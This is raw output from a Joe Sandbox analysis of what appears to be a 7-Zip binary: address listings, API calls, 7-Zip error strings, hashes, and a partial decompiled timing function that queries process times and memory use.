                                                                                                    0x003df808
                                                                                                    0x003df80e
                                                                                                    0x003df817
                                                                                                    0x003df81f
                                                                                                    0x003df823
                                                                                                    0x003df82b
                                                                                                    0x003df82e
                                                                                                    0x003df837
                                                                                                    0x003df839
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df842
                                                                                                    0x003df84d
                                                                                                    0x003df856
                                                                                                    0x003df85e
                                                                                                    0x003df862
                                                                                                    0x003df867
                                                                                                    0x003df869
                                                                                                    0x003df86d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df86d
                                                                                                    0x003dfa5e
                                                                                                    0x003dfa69
                                                                                                    0x003dfa76
                                                                                                    0x003dfa7c
                                                                                                    0x003dfa84
                                                                                                    0x003dfa8c
                                                                                                    0x003dfa97
                                                                                                    0x003dfaa3
                                                                                                    0x003dfaa9
                                                                                                    0x003dfab3
                                                                                                    0x003dfabb
                                                                                                    0x003dfabf
                                                                                                    0x003dfac7
                                                                                                    0x003dfacb
                                                                                                    0x003dfad0
                                                                                                    0x003dfad4
                                                                                                    0x003dfaf0
                                                                                                    0x003dfaf7
                                                                                                    0x003dfafd
                                                                                                    0x003dfb01
                                                                                                    0x003dfb0c
                                                                                                    0x003dfb10
                                                                                                    0x003dfb15
                                                                                                    0x003dfb18
                                                                                                    0x00000000
                                                                                                    0x003dfb18
                                                                                                    0x003df772
                                                                                                    0x003df77c
                                                                                                    0x003df781
                                                                                                    0x003df783
                                                                                                    0x003df785
                                                                                                    0x003df797
                                                                                                    0x003df79e
                                                                                                    0x003df79e
                                                                                                    0x003df79e
                                                                                                    0x003df7a3
                                                                                                    0x003df787
                                                                                                    0x003df787
                                                                                                    0x003df787
                                                                                                    0x003df7a8
                                                                                                    0x003df7b3
                                                                                                    0x003df7bf
                                                                                                    0x003df7c5
                                                                                                    0x003df7cf
                                                                                                    0x003df7d7
                                                                                                    0x003df7db
                                                                                                    0x003df7e3
                                                                                                    0x003df7e7
                                                                                                    0x003df7ec
                                                                                                    0x00000000
                                                                                                    0x003df7ec
                                                                                                    0x003df60a
                                                                                                    0x003df60b
                                                                                                    0x003df616
                                                                                                    0x003df61b
                                                                                                    0x003df61f
                                                                                                    0x003df623
                                                                                                    0x003df695
                                                                                                    0x003df695
                                                                                                    0x003df6a0
                                                                                                    0x003df6a2
                                                                                                    0x003df73f
                                                                                                    0x003df745
                                                                                                    0x00000000
                                                                                                    0x003df745
                                                                                                    0x003df6a8
                                                                                                    0x003df6ae
                                                                                                    0x003df6b6
                                                                                                    0x003df6bb
                                                                                                    0x003df6c0
                                                                                                    0x003df6ca
                                                                                                    0x003df6cb
                                                                                                    0x003df6d0
                                                                                                    0x003df6d2
                                                                                                    0x003df6d4
                                                                                                    0x003df6dd
                                                                                                    0x003df6e4
                                                                                                    0x003df6e4
                                                                                                    0x003df6e4
                                                                                                    0x003df6e9
                                                                                                    0x003df6d6
                                                                                                    0x003df6d6
                                                                                                    0x003df6d6
                                                                                                    0x003df6ee
                                                                                                    0x003df6f4
                                                                                                    0x003df706
                                                                                                    0x003df70c
                                                                                                    0x003df716
                                                                                                    0x003df71e
                                                                                                    0x003df722
                                                                                                    0x003df72a
                                                                                                    0x003df72e
                                                                                                    0x003df733
                                                                                                    0x00000000
                                                                                                    0x003df733
                                                                                                    0x003df62d
                                                                                                    0x003df62f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df637
                                                                                                    0x003df642
                                                                                                    0x003df647
                                                                                                    0x003df64d
                                                                                                    0x003df65f
                                                                                                    0x003df665
                                                                                                    0x003df66f
                                                                                                    0x003df677
                                                                                                    0x003df67b
                                                                                                    0x003df683
                                                                                                    0x003df687
                                                                                                    0x003df68c
                                                                                                    0x00000000
                                                                                                    0x003df68c
                                                                                                    0x003df5b0
                                                                                                    0x003df5bc
                                                                                                    0x003df5c2
                                                                                                    0x003df5cc
                                                                                                    0x003df5d4
                                                                                                    0x003df5d8
                                                                                                    0x003df5e0
                                                                                                    0x003df5e4
                                                                                                    0x003df5e9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df579
                                                                                                    0x003df579
                                                                                                    0x003df57f
                                                                                                    0x003df582
                                                                                                    0x003df585
                                                                                                    0x003df587
                                                                                                    0x003df589
                                                                                                    0x003df589
                                                                                                    0x003df589
                                                                                                    0x003df589
                                                                                                    0x003df590
                                                                                                    0x003df591
                                                                                                    0x003df591
                                                                                                    0x00000000
                                                                                                    0x003df579
                                                                                                    0x003df41c
                                                                                                    0x003df41e
                                                                                                    0x003df420
                                                                                                    0x003df56a
                                                                                                    0x00000000
                                                                                                    0x003df56a
                                                                                                    0x003df42c
                                                                                                    0x003df438
                                                                                                    0x003df43e
                                                                                                    0x003df448
                                                                                                    0x003df450
                                                                                                    0x003df454
                                                                                                    0x003df45c
                                                                                                    0x003df460
                                                                                                    0x003df465
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df2b3
                                                                                                    0x003df2b3
                                                                                                    0x003df2b3
                                                                                                    0x003df2b7
                                                                                                    0x003df2d1
                                                                                                    0x003df2b9
                                                                                                    0x003df2c9
                                                                                                    0x003df2c9
                                                                                                    0x003df2dd
                                                                                                    0x003df2e3
                                                                                                    0x003df2e8
                                                                                                    0x003df2ec
                                                                                                    0x003df2f0
                                                                                                    0x003df30a
                                                                                                    0x003df30d
                                                                                                    0x003df30e
                                                                                                    0x003df317
                                                                                                    0x003df31b
                                                                                                    0x003df320
                                                                                                    0x003df327
                                                                                                    0x003df32c
                                                                                                    0x003df330
                                                                                                    0x003df343
                                                                                                    0x003df343
                                                                                                    0x003df343
                                                                                                    0x003df343
                                                                                                    0x00000000
                                                                                                    0x003df343
                                                                                                    0x003df332
                                                                                                    0x003df335
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df337
                                                                                                    0x003df33b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df33d
                                                                                                    0x00000000
                                                                                                    0x003df2f2
                                                                                                    0x003df2fa
                                                                                                    0x003df302
                                                                                                    0x003df347
                                                                                                    0x003df352
                                                                                                    0x003df355
                                                                                                    0x003df357
                                                                                                    0x003df35a
                                                                                                    0x003df471
                                                                                                    0x003df477
                                                                                                    0x003df489
                                                                                                    0x003df48f
                                                                                                    0x003df499
                                                                                                    0x003df4a1
                                                                                                    0x003df4a5
                                                                                                    0x003df4ad
                                                                                                    0x003df4b1
                                                                                                    0x003df4b6
                                                                                                    0x003df4b9
                                                                                                    0x00000000
                                                                                                    0x003df4b9
                                                                                                    0x003df369
                                                                                                    0x003df36a
                                                                                                    0x003df371
                                                                                                    0x003df37c
                                                                                                    0x003df382
                                                                                                    0x003df384
                                                                                                    0x003df38d
                                                                                                    0x003df391
                                                                                                    0x003df397
                                                                                                    0x003df39e
                                                                                                    0x003df3a1
                                                                                                    0x003df3a7
                                                                                                    0x003df3a8
                                                                                                    0x003df3b1
                                                                                                    0x003df3b2
                                                                                                    0x003df3b9
                                                                                                    0x003df3bf
                                                                                                    0x003df3c0
                                                                                                    0x003df3c8
                                                                                                    0x003df3ca
                                                                                                    0x003df3cc
                                                                                                    0x003df4c5
                                                                                                    0x003df4cb
                                                                                                    0x003df4dd
                                                                                                    0x003df4e3
                                                                                                    0x003df4ed
                                                                                                    0x003df4f5
                                                                                                    0x003df4f9
                                                                                                    0x003df501
                                                                                                    0x003df505
                                                                                                    0x003df50a
                                                                                                    0x00000000
                                                                                                    0x003df50a
                                                                                                    0x003df3d5
                                                                                                    0x003df3e1
                                                                                                    0x003df3e3
                                                                                                    0x003df3e5
                                                                                                    0x003df516
                                                                                                    0x003df51c
                                                                                                    0x003df52e
                                                                                                    0x003df534
                                                                                                    0x003df53e
                                                                                                    0x003df546
                                                                                                    0x003df54a
                                                                                                    0x003df552
                                                                                                    0x003df556
                                                                                                    0x003df55b
                                                                                                    0x00000000
                                                                                                    0x003df55b
                                                                                                    0x003df3e5
                                                                                                    0x003df3ee
                                                                                                    0x003df3f2
                                                                                                    0x003df3f7
                                                                                                    0x003df3fe
                                                                                                    0x003df3fe
                                                                                                    0x00000000
                                                                                                    0x003df2b3
                                                                                                    0x003df277
                                                                                                    0x003df281
                                                                                                    0x003df286
                                                                                                    0x003df288
                                                                                                    0x003df28a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df28c
                                                                                                    0x003df28c
                                                                                                    0x003df28f
                                                                                                    0x003df293
                                                                                                    0x003df294
                                                                                                    0x003df294
                                                                                                    0x00000000
                                                                                                    0x003df28c
                                                                                                    0x003df1aa
                                                                                                    0x003df1b7
                                                                                                    0x003df1bd
                                                                                                    0x003df1bf
                                                                                                    0x003df1c1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df1cd
                                                                                                    0x003df1d1
                                                                                                    0x003df1d9
                                                                                                    0x003df1dd
                                                                                                    0x003df1e5
                                                                                                    0x003df1e9
                                                                                                    0x003df1ee
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df123
                                                                                                    0x003df123
                                                                                                    0x003df126
                                                                                                    0x003df12d
                                                                                                    0x003df130
                                                                                                    0x003df13c
                                                                                                    0x003df13c
                                                                                                    0x003df141
                                                                                                    0x003df145
                                                                                                    0x003df147
                                                                                                    0x003df149
                                                                                                    0x003df151
                                                                                                    0x003df156
                                                                                                    0x003df157
                                                                                                    0x003df15f
                                                                                                    0x003df163
                                                                                                    0x003df168
                                                                                                    0x003df16a
                                                                                                    0x003df1f7
                                                                                                    0x003df202
                                                                                                    0x003df208
                                                                                                    0x003df20d
                                                                                                    0x003df212
                                                                                                    0x003df21c
                                                                                                    0x003df21d
                                                                                                    0x003df222
                                                                                                    0x003df224
                                                                                                    0x003df226
                                                                                                    0x003df22f
                                                                                                    0x003df237
                                                                                                    0x003df237
                                                                                                    0x003df237
                                                                                                    0x003df228
                                                                                                    0x003df228
                                                                                                    0x003df228
                                                                                                    0x003df240
                                                                                                    0x003df249
                                                                                                    0x003df24d
                                                                                                    0x003df255
                                                                                                    0x003df259
                                                                                                    0x003df25e
                                                                                                    0x00000000
                                                                                                    0x003df25e
                                                                                                    0x003df173
                                                                                                    0x003df177
                                                                                                    0x00000000
                                                                                                    0x003df17c
                                                                                                    0x003df14b
                                                                                                    0x003df14f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df14f
                                                                                                    0x003df17d
                                                                                                    0x003df17d
                                                                                                    0x003df17e
                                                                                                    0x003df17e
                                                                                                    0x003df183
                                                                                                    0x003df183
                                                                                                    0x00000000
                                                                                                    0x003df183
                                                                                                    0x003df047
                                                                                                    0x003df049
                                                                                                    0x003df04c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df052
                                                                                                    0x003df052
                                                                                                    0x003df058
                                                                                                    0x003df061
                                                                                                    0x003df066
                                                                                                    0x003df068
                                                                                                    0x003df06c
                                                                                                    0x003df072
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df074
                                                                                                    0x003df074
                                                                                                    0x003df07f
                                                                                                    0x003df084
                                                                                                    0x003df087
                                                                                                    0x003df08b
                                                                                                    0x003df08e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df096
                                                                                                    0x003df09d
                                                                                                    0x003df0a0
                                                                                                    0x003df0d0
                                                                                                    0x003df0dd
                                                                                                    0x003df0e1
                                                                                                    0x003df0e9
                                                                                                    0x003df0f5
                                                                                                    0x003df104
                                                                                                    0x003df10f
                                                                                                    0x003df114
                                                                                                    0x003df115
                                                                                                    0x00000000
                                                                                                    0x003df115
                                                                                                    0x003df0a2
                                                                                                    0x003df0a5
                                                                                                    0x003df0a9
                                                                                                    0x003df0ae
                                                                                                    0x003df0b0
                                                                                                    0x003df0b0
                                                                                                    0x003df0b8
                                                                                                    0x003df0bb
                                                                                                    0x003df0bf
                                                                                                    0x003df0c4
                                                                                                    0x003df0c6
                                                                                                    0x003df0c9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003df0cb
                                                                                                    0x003defd8
                                                                                                    0x003defd8
                                                                                                    0x003defdb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003defe2
                                                                                                    0x003defeb
                                                                                                    0x003deff0
                                                                                                    0x003deff4
                                                                                                    0x003defff
                                                                                                    0x003defff
                                                                                                    0x003df003
                                                                                                    0x003df005
                                                                                                    0x003df00c
                                                                                                    0x003df00e
                                                                                                    0x003df012
                                                                                                    0x003df019
                                                                                                    0x003df01d
                                                                                                    0x003df020
                                                                                                    0x003df02b
                                                                                                    0x003df02b
                                                                                                    0x003df02e
                                                                                                    0x003df022
                                                                                                    0x003df028
                                                                                                    0x003df028
                                                                                                    0x003df031
                                                                                                    0x003df038
                                                                                                    0x003df038
                                                                                                    0x003df00c
                                                                                                    0x00000000
                                                                                                    0x003df003
                                                                                                    0x003deff6
                                                                                                    0x003deffd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003deffd
                                                                                                    0x003defd6
                                                                                                    0x003ded8b
                                                                                                    0x003ded8f
                                                                                                    0x003ded93
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ded99
                                                                                                    0x003ded9c
                                                                                                    0x003ded9e
                                                                                                    0x003deda1
                                                                                                    0x003deda1
                                                                                                    0x003deda3
                                                                                                    0x003deda5
                                                                                                    0x003deda5
                                                                                                    0x003deda8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dedaa
                                                                                                    0x003dedab
                                                                                                    0x003dedae
                                                                                                    0x003dedb1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dedb5
                                                                                                    0x003dedb5
                                                                                                    0x003dedb8
                                                                                                    0x003dedb9
                                                                                                    0x003dedb9
                                                                                                    0x003dedbc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dedbe
                                                                                                    0x003dedbf
                                                                                                    0x003dedc2
                                                                                                    0x003dedc5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dedc7
                                                                                                    0x00000000
                                                                                                    0x003dedb9
                                                                                                    0x003dedc9
                                                                                                    0x003dedc9
                                                                                                    0x003dedcd
                                                                                                    0x003dedcd
                                                                                                    0x003dedd0
                                                                                                    0x003dedd6
                                                                                                    0x003dedd6
                                                                                                    0x003deddb
                                                                                                    0x003deddf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dede9
                                                                                                    0x003dedec
                                                                                                    0x003dedee
                                                                                                    0x003dedfa
                                                                                                    0x003dedfd
                                                                                                    0x003dee06
                                                                                                    0x003dee0f
                                                                                                    0x003dee18
                                                                                                    0x003dee21
                                                                                                    0x003dee2d
                                                                                                    0x003dee33
                                                                                                    0x003dee38
                                                                                                    0x003dee41
                                                                                                    0x003dee42
                                                                                                    0x003dee45
                                                                                                    0x003dee4e
                                                                                                    0x003dee50
                                                                                                    0x003dee57
                                                                                                    0x003dee5c
                                                                                                    0x003dee5f
                                                                                                    0x003dee8d
                                                                                                    0x003dee90
                                                                                                    0x003dee92
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dee98
                                                                                                    0x003dee9c
                                                                                                    0x003deea2
                                                                                                    0x003deea5
                                                                                                    0x003deea9
                                                                                                    0x003deeb5
                                                                                                    0x003deec0
                                                                                                    0x003deeca
                                                                                                    0x003deed0
                                                                                                    0x003deed8
                                                                                                    0x003deedc
                                                                                                    0x003deee7
                                                                                                    0x003deee9
                                                                                                    0x003deeec
                                                                                                    0x003deef1
                                                                                                    0x003deef3
                                                                                                    0x003deefb
                                                                                                    0x003deefe
                                                                                                    0x003def00
                                                                                                    0x003def02
                                                                                                    0x003def06
                                                                                                    0x003def12
                                                                                                    0x003def1f
                                                                                                    0x003def1f
                                                                                                    0x003def21
                                                                                                    0x003def24
                                                                                                    0x003def34
                                                                                                    0x003def34
                                                                                                    0x003def39
                                                                                                    0x003def3c
                                                                                                    0x003def3c
                                                                                                    0x003def00
                                                                                                    0x003def45
                                                                                                    0x003def50
                                                                                                    0x003def54
                                                                                                    0x003def5a
                                                                                                    0x003deea9
                                                                                                    0x00000000
                                                                                                    0x003dee9c
                                                                                                    0x003dee61
                                                                                                    0x003dee67
                                                                                                    0x003dee78
                                                                                                    0x003dee78
                                                                                                    0x00000000
                                                                                                    0x003dee67
                                                                                                    0x003dedf0
                                                                                                    0x003dedf0
                                                                                                    0x00000000
                                                                                                    0x003dedf0
                                                                                                    0x003dece3
                                                                                                    0x003decee
                                                                                                    0x003decf2
                                                                                                    0x003ded04
                                                                                                    0x003ded09
                                                                                                    0x003ded10
                                                                                                    0x003ded1d
                                                                                                    0x003ded23
                                                                                                    0x003ded28
                                                                                                    0x003ded2e
                                                                                                    0x003ded34
                                                                                                    0x003ded3a
                                                                                                    0x003ded46
                                                                                                    0x003ded4c
                                                                                                    0x003ded52
                                                                                                    0x003ded63
                                                                                                    0x003ded64
                                                                                                    0x003ded6f
                                                                                                    0x003ded73
                                                                                                    0x00000000
                                                                                                    0x003ded73
                                                                                                    0x003dec92
                                                                                                    0x003dec95
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dec97
                                                                                                    0x00000000
                                                                                                    0x003dec97
                                                                                                    0x003dec54
                                                                                                    0x003dec5d
                                                                                                    0x003dec66
                                                                                                    0x003dec69
                                                                                                    0x003dec70
                                                                                                    0x003dec75
                                                                                                    0x003dec79
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003dec7b
                                                                                                    0x00000000
                                                                                                    0x003dec7b
                                                                                                    0x003deb9f
                                                                                                    0x003deba8
                                                                                                    0x003debae
                                                                                                    0x003debb1
                                                                                                    0x003debb6
                                                                                                    0x003debb8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003deb7b
                                                                                                    0x003deb86
                                                                                                    0x003debba
                                                                                                    0x003debc8
                                                                                                    0x003debce
                                                                                                    0x003debd6
                                                                                                    0x003debdb
                                                                                                    0x003debe9
                                                                                                    0x003debee
                                                                                                    0x003debee
                                                                                                    0x003debee
                                                                                                    0x003debfa
                                                                                                    0x00000000
                                                                                                    0x003debfa
                                                                                                    0x003deb79
                                                                                                    0x003deaf4
                                                                                                    0x003deaf9
                                                                                                    0x00000000
                                                                                                    0x003deaf9
                                                                                                    0x003deaae
                                                                                                    0x003deab4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003deab8
                                                                                                    0x00000000
                                                                                                    0x003dea8f
                                                                                                    0x003dea8f
                                                                                                    0x003dea8f
                                                                                                    0x003deafe
                                                                                                    0x003deb0c
                                                                                                    0x003deb12
                                                                                                    0x003deb1a
                                                                                                    0x003deb1f
                                                                                                    0x003deb2d
                                                                                                    0x003dfb1d
                                                                                                    0x003e00fc
                                                                                                    0x003e00fc
                                                                                                    0x003e0106
                                                                                                    0x003e010b
                                                                                                    0x00000000
                                                                                                    0x003e010b
                                                                                                    0x003dea8d
                                                                                                    0x003de9da
                                                                                                    0x003de9e4
                                                                                                    0x003de9e5
                                                                                                    0x003de9f3
                                                                                                    0x00000000
                                                                                                    0x003de9f3
                                                                                                    0x003de9af
                                                                                                    0x003de9b2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de9b4
                                                                                                    0x003de9bb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de9c0
                                                                                                    0x003de9c1
                                                                                                    0x003de9c2
                                                                                                    0x003de987
                                                                                                    0x003de98f
                                                                                                    0x00000000
                                                                                                    0x003de98f
                                                                                                    0x003de99f
                                                                                                    0x003de99f
                                                                                                    0x00000000
                                                                                                    0x003de99f
                                                                                                    0x003de980
                                                                                                    0x003de981
                                                                                                    0x003de982
                                                                                                    0x00000000
                                                                                                    0x003de982
                                                                                                    0x003de92e
                                                                                                    0x003de931
                                                                                                    0x003de933
                                                                                                    0x003de939
                                                                                                    0x003de93e
                                                                                                    0x003de93f
                                                                                                    0x003de949
                                                                                                    0x003de949
                                                                                                    0x003de94e
                                                                                                    0x003de952
                                                                                                    0x003dec2c
                                                                                                    0x003dec2c
                                                                                                    0x00000000
                                                                                                    0x003de958
                                                                                                    0x003de958
                                                                                                    0x003de95b
                                                                                                    0x003de95e
                                                                                                    0x003de963
                                                                                                    0x003de965
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de96b
                                                                                                    0x003de952
                                                                                                    0x003de8db
                                                                                                    0x003de8df
                                                                                                    0x003dec41
                                                                                                    0x00000000
                                                                                                    0x003de8e5
                                                                                                    0x003de8eb
                                                                                                    0x003de8f0
                                                                                                    0x003de8f1
                                                                                                    0x003de8fb
                                                                                                    0x00000000
                                                                                                    0x003de8fb
                                                                                                    0x003de8df
                                                                                                    0x003de865
                                                                                                    0x003de867
                                                                                                    0x003de87a
                                                                                                    0x003de87a
                                                                                                    0x00000000
                                                                                                    0x003de87a
                                                                                                    0x003de869
                                                                                                    0x003de86e
                                                                                                    0x003de876
                                                                                                    0x003de878
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de878
                                                                                                    0x003de712
                                                                                                    0x003de71d
                                                                                                    0x003de720
                                                                                                    0x003de730
                                                                                                    0x003de733
                                                                                                    0x003de73d
                                                                                                    0x003de74a
                                                                                                    0x003de74b
                                                                                                    0x003de750
                                                                                                    0x003de756
                                                                                                    0x003de778
                                                                                                    0x003de77c
                                                                                                    0x003de782
                                                                                                    0x003de78b
                                                                                                    0x003de78d
                                                                                                    0x003de7e7
                                                                                                    0x003de7ee
                                                                                                    0x003de7f0
                                                                                                    0x00000000
                                                                                                    0x003de7f2
                                                                                                    0x003de7f5
                                                                                                    0x003de800
                                                                                                    0x00000000
                                                                                                    0x003de800
                                                                                                    0x003de78f
                                                                                                    0x003de79b
                                                                                                    0x003de7a0
                                                                                                    0x003de7a4
                                                                                                    0x003de7af
                                                                                                    0x003de7b3
                                                                                                    0x003de7bc
                                                                                                    0x003de7c1
                                                                                                    0x003de7c3
                                                                                                    0x003de7cb
                                                                                                    0x003de7d0
                                                                                                    0x003de7d0
                                                                                                    0x003de7d7
                                                                                                    0x003de7db
                                                                                                    0x003de7e0
                                                                                                    0x003de7e5
                                                                                                    0x003de81f
                                                                                                    0x003de825
                                                                                                    0x003de825
                                                                                                    0x003de825
                                                                                                    0x003de834
                                                                                                    0x00000000
                                                                                                    0x003de83a
                                                                                                    0x00000000
                                                                                                    0x003de7e5
                                                                                                    0x003de758
                                                                                                    0x003de763
                                                                                                    0x003de768
                                                                                                    0x003de802
                                                                                                    0x003de813
                                                                                                    0x00000000
                                                                                                    0x003de819
                                                                                                    0x003de756
                                                                                                    0x003de6f8
                                                                                                    0x003de6fc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de6fc
                                                                                                    0x003de6af
                                                                                                    0x003de6b2
                                                                                                    0x003de6bd
                                                                                                    0x003de6c0
                                                                                                    0x003de6c0
                                                                                                    0x003de6c3
                                                                                                    0x003de6c3
                                                                                                    0x003de6c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de6cc
                                                                                                    0x003de6cd
                                                                                                    0x003de6d0
                                                                                                    0x003de6d3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de6d3
                                                                                                    0x003de6c3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003de69f
                                                                                                    0x003de69f
                                                                                                    0x003de69f
                                                                                                    0x003e01cd
                                                                                                    0x003e01d2
                                                                                                    0x003e01db
                                                                                                    0x003e01db

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003DE651
                                                                                                      • Part of subcall function 003B5500: __EH_prolog.LIBCMT ref: 003B5505
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                      • Part of subcall function 003B6F7C: __EH_prolog.LIBCMT ref: 003B6F81
                                                                                                    • _CxxThrowException.MSVCRT(?,004302C0), ref: 003DE8FB
                                                                                                    • _CxxThrowException.MSVCRT(?,004302C0), ref: 003DE949
                                                                                                    • GetProcAddress.KERNEL32(00000000,MAPISendMail), ref: 003DFB2B
                                                                                                      • Part of subcall function 003DE37A: __EH_prolog.LIBCMT ref: 003DE37F
                                                                                                    • wcscmp.MSVCRT ref: 003DF096
                                                                                                    • _CxxThrowException.MSVCRT(?,004349E0), ref: 003DF115
                                                                                                    • memset.MSVCRT ref: 003DFD3F
                                                                                                    • memset.MSVCRT ref: 003DFD7A
                                                                                                    • memset.MSVCRT ref: 003DFDB5
                                                                                                    • CompareFileTime.KERNEL32(?,00000018,?,00000000,?,00000000), ref: 003DFF62
                                                                                                    • CompareFileTime.KERNEL32(?,-00000008), ref: 003DFF77
                                                                                                      • Part of subcall function 003DE1A3: __EH_prolog.LIBCMT ref: 003DE1A8
                                                                                                      • Part of subcall function 003E1AA2: __EH_prolog.LIBCMT ref: 003E1AA7
                                                                                                      • Part of subcall function 003E1AA2: ctype.LIBCPMT ref: 003E1ACB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrowmemset$CompareFileTime$AddressProcctypefreewcscmp
                                                                                                    • String ID: $7-Zip cannot find MAPISendMail function$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$Net
                                                                                                    • API String ID: 2048656472-1020834506
                                                                                                    • Opcode ID: db1361995f56f7057b6f5713d053bc65ff8dcf6dd3a56395b4de3d7075e464fe
                                                                                                    • Instruction ID: e9c849d098da1287197623e31d8abaf6be35bf1bd4f1df24845f64eb31cf0e89
                                                                                                    • Opcode Fuzzy Hash: db1361995f56f7057b6f5713d053bc65ff8dcf6dd3a56395b4de3d7075e464fe
                                                                                                    • Instruction Fuzzy Hash: BD03D231800298DFDF17EFA4D895BECBBB1AF15304F1440AAE4456B292DB746F89DB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EA7A4 Relevance: 56.2, APIs: 17, Strings: 15, Instructions: 209libraryloadertimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 69%
                                                                                                    			E003EA7A4() {
				int _v8;
				int _v12;
				struct HINSTANCE__* _v16;
				long _v20;
				int _v24;
				char _v28;
				struct HINSTANCE__* _v32;
				long _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				void* _v56;
				struct _FILETIME _v60;
				intOrPtr _v64;
				signed int _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				intOrPtr _v108;
				void _v116;
				void* __ebp;
				int _t54;
				struct HINSTANCE__* _t58;
				struct _IO_FILE** _t78;
				void* _t81;
				struct _IO_FILE** _t83;
				struct _IO_FILE** _t85;
				void* _t87;
				struct _IO_FILE** _t89;
				struct HINSTANCE__* _t94;
				void* _t100;
				struct _IO_FILE** _t114;
				void* _t121;
				void* _t126;
				_Unknown_base(*)()* _t134;
				intOrPtr* _t141;

				_t54 = GetProcessTimes(GetCurrentProcess(),  &_v60,  &_v76,  &_v44,  &_v52);
				if(_t54 != 0) {
					E003BA4D0(_t54,  &_v68);
					memset( &_v116, 0, 0x28);
					_v12 = 0;
					_v8 = 0;
					_v28 = 0;
					_v24 = 0;
					_t58 = GetModuleHandleW(L"kernel32.dll");
					_v16 = _t58;
					_t134 = GetProcAddress(_t58, "K32GetProcessMemoryInfo");
					if(_t134 != 0) {
						L4:
						_v12 =  *_t134(GetCurrentProcess(),  &_v116, 0x28);
						L5:
						_t141 = GetProcAddress(_v16, "QueryProcessCycleTime");
						_t152 = _t141;
						if(_t141 != 0) {
							_v8 =  *_t141(GetCurrentProcess(),  &_v28);
						}
						_v16 = _v44.dwHighDateTime;
						_v20 = _v44.dwLowDateTime;
						_v32 = _v52.dwHighDateTime;
						_v36 = _v52.dwLowDateTime;
						_t132 = _v68;
						_t144 = _v64;
						_t137 = _t132 - _v60.dwLowDateTime;
						asm("sbb esi, ecx");
						E003EAA30(_t132, _t152, _v20, _v16, _t132 - _v60.dwLowDateTime, _v64);
